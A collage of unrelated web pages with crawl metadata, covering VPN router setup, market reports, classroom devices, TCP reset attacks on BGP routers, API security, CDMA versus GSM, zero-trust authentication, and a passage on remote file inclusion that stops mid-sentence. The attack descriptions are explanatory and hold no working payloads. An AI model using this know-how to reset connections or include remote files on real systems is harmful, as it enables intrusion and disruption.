For example, disabling HTTP cookies means that many websites will have issues, especially if a user needs to log in. Disabling Autofill means you’ll need to retype common information on websites over and over again. Using a 3rd-party password manager is good, but there is no guarantee that that software doesn’t have vulnerabilities and, if it’s cloud-based, you are still sending password information off to a 3rd-party and trusting that it is secure and confidential.
In general, the best option is to browse in “Incognito mode.” This means that there are little to no local artifacts saved from a session for local attackers to exploit, but you’ll also get no site customization or saved logins. | <urn:uuid:916cf3c0-304a-4dcf-861c-bcf26c2dbef2> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2018/03/06/criminals-build-web-dossiers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00754.warc.gz | en | 0.918268 | 1,001 | 2.765625 | 3 |
The setup for this is done in three parts and since there are many videos on two of the parts, I will simply include those videos.
Part 1: Setup PIA VPN on your pfSense. You have to have this completed and established before you can create firewall rules for routing your OpenVPN connections through this for Internet traffic. Please note, this is for PIA VPN and no others. You will have to do your own research on how to setup other VPNs with your pfSense.
Tom’s Video: https://www.youtube.com/watch?v=ov-xddVpxhc
Part 2: Setup OpenVPN on your pfSense. Again, Tom has a great in-depth video showing how to accomplish this.
Tom’s Video: https://www.youtube.com/watch?v=7rQ-Tgt3L18
Part 3: This is where you create a firewall rule on your PIAVPN interface. Add the rule as shown in the Figure. You can ignore all the rules except the bottom one. IMPORTANT: Change the gateway to your PIAVPN Outbound one and not your WAN gateway. You can do this while creating the rule and the option is midway down the rule screen, see Figure.
I statically map every device on my network. It makes making aliases very easy. You should do this for any device you plan on adding to this next step for creating an alias.
Create an Alias. I call mine VPN_Use, See Figure. Enter any device that you want to use the PIA VPN. This includes your OpenVPN connections. For example, if you get assigned a remote IP of 192.168.100.2 by your OpenVPN server, add that address to this alias.
Next, go into each firewall rule for each interface, including your OpenVPN Interface. If you don’t ever plan on using PIAVPN on a particular interface, then you don’t need this step. For me, I have various devices across my IoT, LANNET, OpenVPN, and Server (for virtual machines), that I want to use PIAVPN.
Rule order is important so make sure you get them correct by doing a lot of testing. Add the two rules circled in RED in the Figure FOR EACH Interface. Again, make sure you have PIAVPN for the Allow and the Kill Switch for WAN as block. You don’t need the kill switch but if you are worried about the devices on your Alias not using the VPN then you should keep this rule too.
I hope this help most people who are interested in this type of setup. I will try to answer questions as the come up but please make sure you follow the proper setup for getting both OpenVPN and PIAVPN working independently BEFORE doing this. | <urn:uuid:e0f54c88-65ae-48b9-b2f2-682c30240491> | CC-MAIN-2022-40 | https://forums.lawrencesystems.com/t/openvpn-to-pfsense-home-network-plus-pia-vpn/1410 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00754.warc.gz | en | 0.925198 | 590 | 2.515625 | 3 |
The global liquid nitrogen cryopreservation market accounted revenue of US$1,805.5 Mn in 2020 with a growing CAGR of 12.5% for the analysis period of 2021 to 2028
The Journal of Fertilization: In vitro - IVF-Worldwide, Reproductive Medicine, Genetics & Stem Cell Biology defines liquid nitrogen cryopreservation as a substance produced through an industrial process using the fractional distillation method. Furthermore, liquid nitrogen is a cryogenic fluid that is required for in-vitro reproductive technologies, which are widely used in human IVF, the cattle industry for in-vitro embryo production, and livestock breeding.
Rising number of government initiatives for preservation of stem cells foster the ultimate growth of global market
The National Cord Blood Program (NCBP), established in 1992, examines cord blood as a potential remedy for vital public health. This is for determining appropriate hemopoetic transplants for patients who do not have a match for bone marrow donor. NCBP freezes and stores cord blood units in liquid nitrogen so that they can be shipped as needed. In 2011, the Canadian Department of Health established the first publicly funded national umbilical cord blood bank in Canada, which accepts donations for allergenic stem cell transplantation hematopoietic stem cell transplantation. Furthermore, the UK Stem Cell Bank, which is sponsored by the UK Medical Research Council, is a quality-controlled, ethically accepted, and confirmed repository for human embryo, foetus, and adult stem cell lines that are provided by the Science and Healthcare Growth, Biotechnology, and Biological Research Council. The Stem Cell Bank (UK) distributed human cell lines to Sheffield University for use in medical trials and research. Storage and preservation of stem cells, bone marrow cells, foetus and sperm needs an extremely low temperature, making liquid nitrogen as the best suitable option. Such aforementioned factors will have a positive impact on the overall growth of the global liquid nitrogen cryopreservation market.
To learn more about this report, request a free sample copy
High risk associated during handling of liquid nitrogen cryopreservation equipment limit the growth of global market
When nitrogen circulated from a cryogenic storage vessel and the oxygen concentration around it is unacceptably high, the utility of freezers is jeopardized. Moreover, liquid nitrogen is extremely cold in nature and can make rapid frostbite or cold contact burns on the exposed skin that comes into contact with it. Accidental releases or overflow of liquid nitrogen pose hazards and cause property damage, and most common cause of accidental releases is insufficient training on handling specific hazards materials. Leak of LN2 into laboratories pose the greatest risk of asphyxiation, personal injury, and environmental harm among others.
|Market||Liquid Nitrogen Cryopreservation Market|
|Analysis Period||2017 - 2028|
|Forecast Data||2021 - 2028|
|Segments Covered||By Application, By End-Use and By Geography|
|Regional Scope||North America, Europe, Asia Pacific, Latin America, and Middle East & Africa|
|Key Companies Profiled||
CUSTOM BIOGENIC SYSTEMS, Chart Industries, Linde, Taylor-Wharton, Antech Group Inc., Abeyance Cryo Solutions, Thermo Fisher Scientific, Inc., Worthington Industries, Inc., BIOLOGIX GROUP LTD, and others
||Market Trends, Drivers, Restraints, Competitive Analysis, Player Profiling, Regulation Analysis|
|Customization Scope||10 hrs of free customization and expert consultation
The ability to replace organs and tissues on demand saves and improves millions of lives worldwide each year, resulting in public health benefits by curing numerous life-threatening diseases. Advanced organ preservation techniques may even allow for cutting-edge pretransplant interventions with the potential to improve transplant outcomes, such as immunomodulation or gene therapy approaches for functional augmentation in specialized laboratories. Such factors have resulted in a high demand for the liquid nitrogen cryopreservation market, which has led to the overall growth of the global market.
Global liquid nitrogen cryopreservation market is segmented based on application and end-use. By application, the market is segmented as stem cells, sperms, semen, & testicular tissues, embryos & oocytes, and others. End-use is segmented as stem cell banks, biotechnology and pharmaceutical organization, contract research organization, stem cell research laboratories, and research and academic institutes.
Based on application, stem cell segment dominates the overall market by recording considerable revenue and will continue to do so till the foreseeable future. Based on end-use, stem cell research laboratories segment dominates the segmental growth by recording dominating share.
Europe records considerable market share for liquid nitrogen cryopreservation
The increasing number of contract manufacturing organizations (CMO) and contract research organizations (CRO), as well as increased R&D activities related to cell line development and stem cell research are key factors driving the global market. Furthermore, rising partnerships and agreements enhances the business presence with rising customer base will positively influence the target market's growth.
Asia Pacific registers fastest growing CAGR for liquid nitrogen cryopreservation market
Countries such as South Korea, Russia, India, and others are focusing on strengthening their research and development capabilities in response to the rising COVID-19, and are spending on the development and establishment of advanced laboratories. As a result, the demand for liquid nitrogen freezers is increasing. Furthermore, favorable government business policies and the emergence of small and mid-sized players with innovative solutions will drive the global liquid nitrogen cryopreservation market.
The prominent players of global liquid nitrogen cryopreservation market includes CUSTOM BIOGENIC SYSTEMS, Chart Industries, Linde, Taylor-Wharton, Antech Group Inc., Abeyance Cryo Solutions, Thermo Fisher Scientific, Inc., Worthington Industries, Inc., BIOLOGIX GROUP LTD, and others
Market by Application
Market by End-Use
Market By Geography
Market in 2020 was US$1,805.5 Mn and CAGR was accounted to be 12.5% during the forecast period of 2021 to 2028
North America held the dominant position and Asia pacific exhibited the fastest growing CAGR
The prominent players of the global liquid nitrogen cryopreservation market includes CUSTOM BIOGENIC SYSTEMS, Chart Industries, Linde, Taylor-Wharton, Antech Group Inc., Abeyance Cryo Solutions, Thermo Fisher Scientific, Inc., Worthington Industries, Inc., BIOLOGIX GROUP LTD, and others. | <urn:uuid:ac80b1a1-0cd0-459e-af03-55f195f45857> | CC-MAIN-2022-40 | https://www.acumenresearchandconsulting.com/liquid-nitrogen-cryopreservation-market | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00754.warc.gz | en | 0.883644 | 1,418 | 2.71875 | 3 |
A survey finds that over 50 percent of all teachers report that they have more individual devices than ever before.
The goal of classroom computers is to put one in the hands of every student; a one-to-one (1:1) ratio. More than 50 percent of all teachers across the nation now have this one-to-one, student-to-device ratio which is up 10 percent from last year’s numbers.
This is good news for students, according to the findings of a Michigan State University study which was conducted over the past 15 years. Providing a notebook or tablet to students resulted in better grades in English, writing, math, and science.
“It’s not like just providing a laptop to every student will automatically increase their achievement, but we find that it’s the first step,” Binbin Zheng, an assistant professor of technology and literacy education, reports.
How to Achieve Academic Success After Technology Deployment
In order for the technological devices to benefit the student, districts need the educator to buy-in to the new program, good tech support, professional development, and integration with curriculum. It also helps to choose the right device to give to the students.
A recent paper released by THE Journal advises that school IT executives need to create a matrix that matches and compliments the curriculum goals. They also need to match the students’ cognitive potential. Whereas a notebook is great for older students, it may prove to be too complex for a K-3 one-to-one program.
When public schools embarked on a one-to-one program, students overwhelmingly wanted tablets–things like iPads and Microsoft Surfaces, and other such devices. But many executives believed that it was important for the student to use devices that would better prepare the student for college and career life. Very few people outside of the classroom use tablets as their main, or even secondary device. | <urn:uuid:68198609-b491-4851-ac84-fd8b6b7a6768> | CC-MAIN-2022-40 | https://ddsecurity.com/2017/03/23/50-percent-teachers-report-11-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00754.warc.gz | en | 0.964443 | 392 | 3.453125 | 3 |
A security researcher has developed a new attack for a well-known flaw in the TCP protocol that allows an attacker to effectively shut down targeted routers and terminate existing TCP sessions at will. The scenario has many security experts worried, given the ubiquity of TCP and the fact that theres an attack tool already circulating on the Internet.
The basic problem lies in the fact that existing TCP sessions can be reset by sending specially crafted RST (reset) or Syn (synchronization) packets to either of the machines involved in the session. This is in fact an intended feature of the protocol.
However, the source IP addresses on these packets can be forged, which makes it possible for attackers not involved in the TCP session to terminate the connection, causing a de facto denial of service.
Security experts have known for some time that such an attack was possible in theory, but had thought it to be impractical to implement in the real world because of the difficulty of guessing the random numbers used to establish new TCP sessions.
Machines on the receiving end of TCP packets look for this number as a way of determining the authenticity of incoming requests. The numbers are randomly generated and come from a pool of about 4 billion possible 32-bit sequences.
But a researcher named Paul Watson has discovered that machines receiving TCP packets will accept packets containing numbers that are within a certain range of the actual sequence number. This makes it far easier to create authentic-looking packets capable of shutting down TCP sessions, according to an analysis of the attack posted Tuesday by the National Infrastructure Security Coordination Center, Englands national clearinghouse for security data.
Known as a “window,” this range of acceptable sequence numbers is established during the initial TCP handshake and varies depending on the devices and applications involved. A larger window size makes it easier for this attack to succeed. And with an automated attack tool already out there, experts expect to see quite a bit of activity in the coming days.
“It takes about 15 seconds for the attack tool to resize the window and guess the number and crash the device,” said Chris Rouland, vice president of the X-Force research team at Internet Security Systems Inc. in Atlanta. “This certainly will become another tool in the arsenal [of attackers].”
Experts say BGP (Border Gateway Protocol) is likely to be most vulnerable to this issue because it relies on a persistent TCP connection between peers. ISPs use the protocol to exchange routing information, and resetting BGP connections often creates the need to rebuild routing tables altogether.
Many of the backbone service providers have updated their devices to guard against the new attack, Rouland said, as they were given advance notice of the public release of the information.
The likelihood of actual attacks using this technique is lessened somewhat by the fact that attackers need to know both the source and destination IP addresses as well as the source and destination ports for whatever connection they want to go after.
Also, using IP Sec wherever possible to encrypt TCP sessions prevents attackers from being able to see TCP data for those sessions.
Watson plans to discuss the new technique in more detail at the CanSecWest security conference this week in Vancouver, British Columbia.
Be sure to add our eWEEK.com security news feed to your RSS newsreader or My Yahoo page: | <urn:uuid:619b7cee-fcd2-427d-8540-b0a6dc11c159> | CC-MAIN-2022-40 | https://www.eweek.com/security/flaw-leaves-internet-open-to-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00154.warc.gz | en | 0.92842 | 673 | 2.796875 | 3 |
A team of scientists are working on a diabetes tracking wearable device
Scientists from the Centre for Nanoparticle Research at South Korea’s Institute for Basic Science have developed a wearable patch that accurately monitors glucose levels in diabetics and administers insulin treatment when required via micro-needles. Researchers hope this combination of automatic monitoring and injections will help diabetics more effectively regulate blood glucose fluctuations.
In order to keep track of blood sugar levels, diabetes sufferers need to prick themselves several times a day to take small samples of blood for testing. They also require regular injections of insulin to keep blood sugar levels at a safe level. It’s a full-time condition which requires constant vigilance, as regular rises in sugar levels in the blood over time can increase the risk of developing long-term complications. This relentless cycle of pricking and injecting, while not especially painful, can be tedious enough to become a chore for many; an issue that can lead to dangerous lapses.
IoT wearable provides non-invasive monitoring and treatment
The result of research from the group of international scientists led by Dae-Hyeong is a patch that can both monitor blood glucose levels through sweat and deliver insulin in a non-invasive manner. The team’s work was published in Nature Nanotechnology earlier this week.
The base of the patch is made up of gold-doped graphene, a strong and flexible material commonly used in wearable devices. The device captures sweat from the person’s skin, and sensors within the patch pick up on the sweat’s pH level and temperature changes; indicators of a high glucose level. Once high sugar levels are recognised, built-in heaters in the patch dissolve a layer of coating, exposing microneedles that release a drug called metformin that can regulate and reduce high blood sugar levels. Blood sugar readings are also wirelessly transmitted to a mobile device so that long term trends are simple to read and monitor.
Speaking with Newsmax, Dr Joel Zonszein, director of the Clinical Diabetes Center at Montefiore Medical Center in New York City, said the cost of the partially gold device will be an initial barrier.
However, he said: “They have proved the concept — that a sweat patch can do the monitoring and can deliver a drug transdermally [through the skin]. Trying to do something like this noninvasively really is the holy grail of diabetes. So, there may be a future for this, but there are many barriers to be overcome”.
There are several potential benefits of using IoT wearables for the treatment of diabetes.
Speaking exclusively to Internet of Business, Collette Johnson, director of medical at Plextek Consulting, said: “This is a real game-changer for type two diabetes, as unlike type one, the disease fluctuates and tends to affect people later in life. Adjusting to a new medical regime and diet can be difficult, but with intelligent monitoring it can help reduce complications in the long-term, which in turn reduces the cost of treatment and allows people more freedom.”
More widely, IoT technology stands to make a significant impact across the medical industry.
Johnson said: “IoT will have an enormous impact on healthcare, as it will allow patients to be treated in their homes but with an additional level of mobility due to its interfacing with smart city networks. IoT technology could provide confidence to sufferers of a range of conditions, offering “freedom and opportunities to patients that traditionally feel constrained to their home due to their illness.” | <urn:uuid:bc5116d9-45af-400c-b5b6-f9cd50d614cd> | CC-MAIN-2022-40 | https://internetofbusiness.com/scientists-develop-diabetes-wearable/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00154.warc.gz | en | 0.945443 | 737 | 3.359375 | 3 |
API usage in application development has become a standard.
APIs are a critical aspect of business delivery in the digital world – they connect mobile applications, the Internet of Things, and provide the structure that links internal business processes.
Considering the pervasiveness and importance of APIs, it’s obvious that we should secure them– after all, we don’t want hackers to use an API to access our business information housed in mobile apps, devices in your home, or processes that could cripple your business if they were compromised.
According to Gartner, by 2022, API abuses will be the most-frequent attack vector resulting in data breaches for enterprise web applications.
In this article we’ll discuss top API security threats and API protection best practices.
APIs and modern web applications
APIs allow developers to create an open architecture for sharing functionality and data between applications.
APIs give client-side developers—both legitimate developers and potential system crackers—much more finely grained access into an application than a typical web app. This is because the granularity boundary for calls to back-end tiers moves from relatively secure internal tiers (those that reside safely in a DMZ) all the way out to the client application residing on the Internet.
The problem with APIs is that they often provide a roadmap describing the underlying implementation of an application—details that would otherwise be buried under layers of web app functionality.
This can give hackers valuable clues that could lead to attack vectors they might otherwise overlook. APIs tend to be extremely clear and self-documenting at their best, providing insight into internal objects and even internal database structure—all valuable intelligence for hackers. But increased visibility isn’t the only risk APIs introduce. Increasing the number of potential calls also increases the attack surface, meaning that a hacker simply has more to exploit.
Top API security threats
DoS attacks – In a Denial of Service (DoS) attack, the attacker in most cases pushes enormous messages requesting the server or network to establish requests consisting of invalid return addresses. The attack is capable of rendering an API into a non-functional situation if the appropriate security precautions are not adopted. In recent times, whether your API is exposed or not, it could possibly be accessible by other people.
As these API DoS attacks become more common, and as organizations increasingly rely on APIs for their business needs, security professionals should proactively plan to deal with such attacks. Even if an API key (or access token) used for application authentication is disabled, a key can easily be reacquired through a standard browser request. Therefore, invalidating a current access token is not a long-term solution. If a DoS attack is traced back to a specific IP address, then blacklisting that IP address isn’t a long-term solution either, because the attacker can easily acquire a new one.
To prevent a massive amount of API requests that can cause a DDoS attack or other misuses of the API service, apply a limit to the number of requests in a given time interval for each API (also called spike arrest). When the rate is exceeded, block access from the API key at least temporarily, and return the 429 (too many requests) HTTP error code.
It’s when an attacker secretly altering, intercepting or relaying communications between two interacting systems and intercept the private and confidential data pass between them. MITM attacks occur in two stages: interception and decryption.
API endpoints are often overlooked from a security standpoint. They live on for a long time after deployment, which makes developers and sysadmins less inclined to tinker with for fear of breaking legacy systems relying on those APIs (think enterprises, banks, etc). Endpoint hardening measures (hashes, key signing, shared secrets to name a few) are, therefore, easier to incorporate at the early stages of API development.
API protection best practices
Focus on authorization and authentication on the front end
APIs are connected to other software. Securing the code properly requires that developers take a multi-pronged approach. This starts with solid authentication, which is the process of checking to see if a person is who they say they are.
Enterprises have been moving away from simple password systems to multistep authentication with a growing emphasis on biometric solutions like fingerprints. Once the person is authenticated, they need to pass an authorization check and gain access to different types of information.
For instance, few employees need access to payroll data, but everyone should be able to read the company president’s blog. Finally, an enterprise needs to make sure that corporate data is kept safe. Increasingly, businesses encrypt information from inception to deletion. Previously, data was encrypted mainly when moving from place to place on the network. With encryption, if the bad guys somehow get in, ideally, they cannot see anything of value.
Use Quotas and Throttling
If you produce an API that is used by a mobile application or particularly rich web client, then you will likely understand the user behavior of those applications clients. If a typical user calls the API once or twice per minute, it’s unlikely that you will encounter several-thousand requests per second at any given time.
A behavioral change such as this is an indication that your API is being misused. Throttling also protects APIs from Denials of Service and from spikes. It’s possible to implement sophisticated throttling rules to redirect overflows of traffic to backup APIs to mitigate these issues.
Turn on SSL everywhere
Make SSL/TLS the rule for all APIs. In the 21st century, SSL isn’t a luxury; it is a basic requirement. Adding SSL/TLS—and applying this correctly—is an effective defense against the risk of man-in-the-middle attacks.
SSL/TLS provides integrity on all data exchanged between a client and a server, including important access tokens such as those used in OAuth. It optionally provides client-side authentication using certificates, which is important in many environments
Don’t rely on traditional solutions
Traditional solutions work based on signatures or known patterns and can only protect you from common, known attacks like SQL injection (SQLi), cross-site scripting (XSS), and cross-site request forgery (CSRF). These solutions can’t detect vulnerabilities in the unique logic of your APIs. On top of that, these “old attacks”, once popular, have become less common because of modern application architectures and development best practices. A few examples:
- Cross-Site Request Forgery (CSRF) and some reflected Cross Site Scripting (XSS) attacks can’t be exploited in many modern web applications since they don’t use cookie based authentication.
- SQL injections (SQLi) are becoming less common because application frameworks provide built-in solutions for developers to avoid them.
Attackers haven’t given up and have also evolved to keep up with the times. Your APIs are complex and unique and attackers take advantage of this by looking for vulnerabilities in the unique logic. These are things that can’t be identified by a signature and are too devious to be addressed with good development practices. Your API protection solution must be able to understand the unique API logic at a granular level to identify potential vulnerabilities and stop attacks.
API protection is a complex topic, and since APIs are an integral part of modern software development, this issue has to be approached carefully. If you’re not sure about what you have to do to protect your APIs, contact us today to help you out with your performance and security needs. | <urn:uuid:0dc99798-358f-45af-b56a-d639cfdeb90c> | CC-MAIN-2022-40 | https://www.globaldots.com/resources/blog/api-protection-best-practices/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00154.warc.gz | en | 0.926029 | 1,587 | 2.671875 | 3 |
In the query to the PRODUCT table, I have a COMPANY_NO column. Since this company’s expansion has not occurred, all rows in the table have a COMPANY_NO = 1. What if I am a beginner and I have heard that indexes are good and have decided to index the COMPANY_NO column? Consider the following example which selects only certain columns from the PLAN_TABLE after executing the query.
The cost-based optimizer will analyze the index as bad and suppress it. The table must be reanalyzed after the index is created for the cost-based optimizer to make an informed choice. The index created on COMPANY_NO is correctly suppressed by Oracle internally (since it would access the entire table and index):
You can force an originally suppressed index to be used (bad choice), as follows:
Indexes can also be suppressed when they cause poorer performance by using the FULL hint:
Next, consider a similar example in an 11gR2 database on a faster server with a 25M row table where I am summing all rows together. Oracle is once again smart enough to do a full table scan since I am summing the entire table. A full table scan only scans the table, but if I force an index (as in the second example), it has to read many more blocks (almost 50 percent more), scanning both the table and the index (resulting in a query that is almost four times slower).
Now let’s try scanning the index and then go to the table (bad idea):
Bad indexes (indexing the wrong columns) can cause as much trouble as forgetting to use indexes on the correct columns. While Oracle’s cost-based optimizer generally suppresses poor indexes, problems can still develop when a bad index is used at the same time as a good index. | <urn:uuid:596e99fa-f1cb-4bb8-a776-9c61debef6ad> | CC-MAIN-2022-40 | https://logicalread.com/oracle-11g-bad-indexes-mc02/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00154.warc.gz | en | 0.919721 | 382 | 2.5625 | 3 |
CDMA vs GSM: What’s the Difference?
March 27, 2018
CDMA and GSM are two acronyms that you will see regularly when reading about anything related to mobile telephony. This article explains what each of the two terms mean, how they are related, why they are different and why you should care.
CDMA or Code Division Multiple Access and GSM or Global System for mobiles are acronyms for the two main radio systems that are in mobile telephones. Each are a title for a collective group of technologies which are run by the same entities.
What is the technology behind GSM: in simple terms?
We start with GSM as this radio access technology was developed first in the evolution of mobile communications.
GSM is a time division system, whereby voice is broken down in to smaller parts and transformed in to digital data. This data is then allocated to a channel and a time slot, then when there are multiple calls happening on one line, the receiver is able to ‘listen’ to the specific channel and time slot, combine the data and replay the voice.
What is the technology behind CDMA: in simple terms?
CDMA is also a radio access technology, which allow us to fit multiple calls, connections and data streams on to one radio channel.
CDMA is a code division system, whereby each call’s data is encoded with a unique key, then the calls are all transmitted at once. The receivers then use a unique key to divide the combined signal back in to individual voice.
Of the two systems, code division became more powerful and is considered a much more flexible technology. However, since it began, GSM has evolved to be quicker than CDMA. CDMA networks are ‘stuck’ at 3.6Mbps whereas GSM networks can theoretically transmit at 42Mbps.
What CDMA vs. GSM Means to You
As a consumer the final call quality is not noticeably determined by the way your carrier has built their network, there may be some good and some bad CDMA and GSM networks, but there are several differences between the technologies that are key things to be aware of as a consumer.
If you want to swap your phone, then a GSM network is much better for you. That’s because GSM carriers put their customer information on a SIM card, which can be removed and inserted to another phone easily. Whereas, with CDMA, in some countries carriers used a network-based ‘white list’ to verify their subscribers. This means that you will require your carriers permission before you can go ahead and change phones.
3G CDMA networks generally are unable to make voice calls and transmit data at the same time, whereas 3g GSM have the ability to transmit these two data types simultaneously.
This handful of information will surely make you ask the question, why would carriers ever have gone with CDMA if GSM came first and seems to have a lot of better options for consumers. The answer is that, in the evolution of mobile networks, when carriers began to switch from analog to digital technologies, CDMA was the best available technology. However, GSM technologies soon caught up with GSM and then began to outperform them, but by that time a lot of carriers infrastructure was already set up and operational.
Although it is possible to switch from CDMA to GSM, many operators are choosing to develop and build out 4G and LTE services rather than investing money in areas that are now obsolete for many of their customers.
Get all of our latest news sent to your inbox each month. | <urn:uuid:8c4c2579-4bd7-4b37-9d11-8312db3507fe> | CC-MAIN-2022-40 | https://www.carritech.com/news/cdma-vs-gsm-whats-the-difference/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00154.warc.gz | en | 0.957702 | 750 | 3.125 | 3 |
Critical Infrastructure Requires a Stronger Security Standard
Lessons From Colonial Pipeline and Other Attacks on Utilities Organizations
US citizens are feeling the consequences from what is thought to be the largest known cybersecurity attack on a US fuel pipeline, the Colonial Pipeline, on May 7. The details around the exact attack vector are still unknown. Amid the cut-off, a shortage of fuel in the southern United States resulted in panic buying, inflated prices and even the hashtag #GasShortage2021.
The hackers, who are thought to be linked to a European group called “DarkSide”, used ransomware to hack Colonial Pipeline — a type of malware that locks victims' files until a payment is provided. Triggering a massive government response, the group claimed they “didn’t mean to cause problems.” It says a lot when the sophisticated hackers themselves are unaware of the potential consequences such attacks have on wider society.
A Ripple Effect of Dangerous Consequences
When we think about cyberattacks, we usually think of data breaches. But when these attacks are aimed at critical infrastructure, we see a strong physical impact that ripples and halts normality for large populations. For this reason, utilities and energy businesses as well as state, local and federal governments experience damage that goes far beyond cyberspace. These organizations are particularly vulnerable due to the physical assets that are at stake, and the large populations that depend on their services to resume normal life.
Just days before the Colonial Pipeline attack, a Norwegian energy firm was victim to a ransomware attack that required a shutdown of water and wastewater facilities — impacting 85 percent of the region’s population.
Earlier this year, the Florida Water Treatment Plant was hacked due to a password vulnerability on a dormant software application, which had no multi-factor authentication (MFA) practice in place. Frighteningly, the attack turned to a case of cyber-terrorism as the hacker adjusted dangerous chemical levels in the water. The attack had the very real potential to poison thousands of people.
The rising sophistication of these hackers and the astronomical consequences on the general public demand for changes in security standards and practices. In a call for more regulation, President Biden required an increase in security standards and signed an executive order to improve the nation’s cybersecurity.
Zero Trust Is Not Only for Governments and the Private Sector Should Follow Their Lead
Among Biden’s order, the importance of a Zero Trust architecture was highlighted and as such, federal agencies are now required to develop a plan to implement this. He ordered the elimination of outdated security models and the adoption of security best practices, such as MFA. What’s more, the official statement from the White House urged privately held companies, such as energy and utilities organizations, to follow suit:
At HID, we could not agree with this statement more. We have a long history of working with the US federal government in enabling Zero Trust. Ten years ago, the US government deployed HID Personal Identity Verification (PIV) cards to secure the complete lifecycle for authentication and access of federal workers. To this day, this remains the largest deployment of an employer to employee public key infrastructure (PKI)-based MFA solution in the world. However, you don’t need to be as large as the federal government to achieve this level of security. HID makes this technology available and accessible to a wide range of organizations.
Your First Line of Defense Starts With MFA
While still not fully understood, the Colonial Pipeline attack is a stark reminder of the practices that should be in place. Time and time again, the critical need for strong MFA covering every access point is brought to our attention. At this time, it is impossible to say whether MFA could have prevented the Colonial Pipeline attack, but as attack methods continue to evolve and become more complex, the ways that users authenticate within organizations also need to evolve.
While a Zero Trust environment is at the core, it should be fortified with MFA everywhere — not just for certain systems, applications or users. It’s crystal clear that passwords alone are not enough to safeguard a business, especially those with ties to critical infrastructure. Instead, utilities organizations must deploy MFA solutions that replace passwords and provide a wide breadth of advanced, adaptable authentication options to close every gap.
Getting Started With MFA and Zero Trust
The point of MFA is to add multiple, additional factors to ensure that users are who they say they are. Basic MFA could include something you know, such as a password, and something you have or are, such as one-time verification code or a biometric, and be powered by software limited in additional capabilities or security options. This is not enough when protecting organizations with critical infrastructure. Instead, implement advanced MFA built for your high-risk environment while meeting best practices and strengthening the walls to your organization:
- Select the right methods and authenticators for your own needs. In critical environments, using MFA that requires a password as your first authenticator is not viable. Instead, advanced MFA software gives you the option to use a diverse range of factors including biometrics, such as a fingerprint or facial recognition, with something you know or have such as a high-assurance smart card or security key. For increased protection, use MFA software that takes advantage of additional capabilities like step-up authentication, that can detect additional security factors such as location, and adjust required authentication as necessary.
- Utilize security standards and protocols. The good news is that security technologies are continuously advancing, but it’s imperative to ensure that your MFA software and devices support these technologies and will continue to do so. At HID, protocols such as OATH, FIDO and PKI certificate-based authentication, which is used by the US federal government, are made available to any business.
- Make MFA easy for your employees, but not for potential hackers. It's not uncommon for hackers to gain access through vulnerabilities of an organization’s own employees. Therefore, it’s important to make MFA an easy experience so that your employees can seamlessly comply and correctly authenticate. Deploy MFA that is convenient for both users and administrators to create a pain-free, risk-free experience that doesn’t get in the way of your security.
- Manage the whole authentication ecosystem. Enhance your MFA with a supporting, complete solution that manages your credentials and digital identities. Leveraging advanced software to power MFA is something, but what about what happens to your devices and credentials throughout their lifecycle full of potential vulnerabilities? Manage them from end-to-end to achieve complete visibility using a unified platform.
In the wake of these cyberattacks and their devastating effects, it’s time to fortify our utilities from the inside out and accelerate towards an industry built on Zero Trust and advanced authentication.
Learn more on how to shift your authentication strategy to a Zero Trust model in our eBook: The Journey to Passwordless.
Jillian Belles is the IAM Director of Strategic Sales for HID Global, the leader in trusted identities. Jillian has been in the IT and securities industry for 24 years, specializing in providing subject matter expertise to high-compliance verticals like state and local government, higher education, energy, and utilities industries. | <urn:uuid:111613ee-ab2d-48d7-8e67-9cef92abe441> | CC-MAIN-2022-40 | https://blog.hidglobal.com/2021/05/critical-infrastructure-requires-stronger-security-standard | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00154.warc.gz | en | 0.943344 | 1,500 | 2.609375 | 3 |
How does remote file inclusion work?
A remote file inclusion (RFI) occurs when a file from a remote web server is inserted into a web page. This can be done on purpose to display content from a remote web application but it can also happen by accident due to a misconfiguration of the respective programming language. Such vulnerabilities can lead to an RFI attack.
Even though this kind of file inclusion can occur in almost every kind of web application, those written in PHP code are more likely to to be vulnerable to remote file inclusion attacks. This is because PHP provides native functions that allow the inclusion of remote files, while other languages usually require a workaround to imitate this behavior.
In order to include a remote file, you have to add a string with the URL of the file to an
include function (in PHP) or its equivalent in another language. Then the web server of the website under attack makes a request to the remote file, fetches its contents, and includes it on the web page serving the content. The file is then processed by the parser of the language.
How can a web application be vulnerable to remote file inclusion?
By default, RFI is often disabled. PHP, for example, introduced a php.ini configuration option to disable RFI in version 5.2.0. There are only a few scenarios where it is actually needed in PHP code. Sometimes, developers enabled it on purpose, and sometimes it is enabled by default on older versions of the server-side programming language.
Usually developers enable such functionality to include local files, but without proper input validation, it is also possible to fetch data from a remote server. Therefore, in most cases when such functionality is enabled, the web application becomes vulnerable to both remote file inclusion and local file inclusion (LFI).
Exploiting a remote file inclusion vulnerability
Consider a developer who wants to include a local file corresponding to the page specified using the GET parameter. They have different PHP files, such as contact.php, main.php, and about.php, all of which provide different functionality to the website. Each file can be called using the following request that is sent to the index.php file:
While the developer expects that only files inside that folder will be included, it might be possible for an attacker to include files from another directory (LFI) or even from a completely different web server (RFI), especially if there is no whitelist of files. In fact, without a whitelist of permitted files, the attacker can change the filepath to the
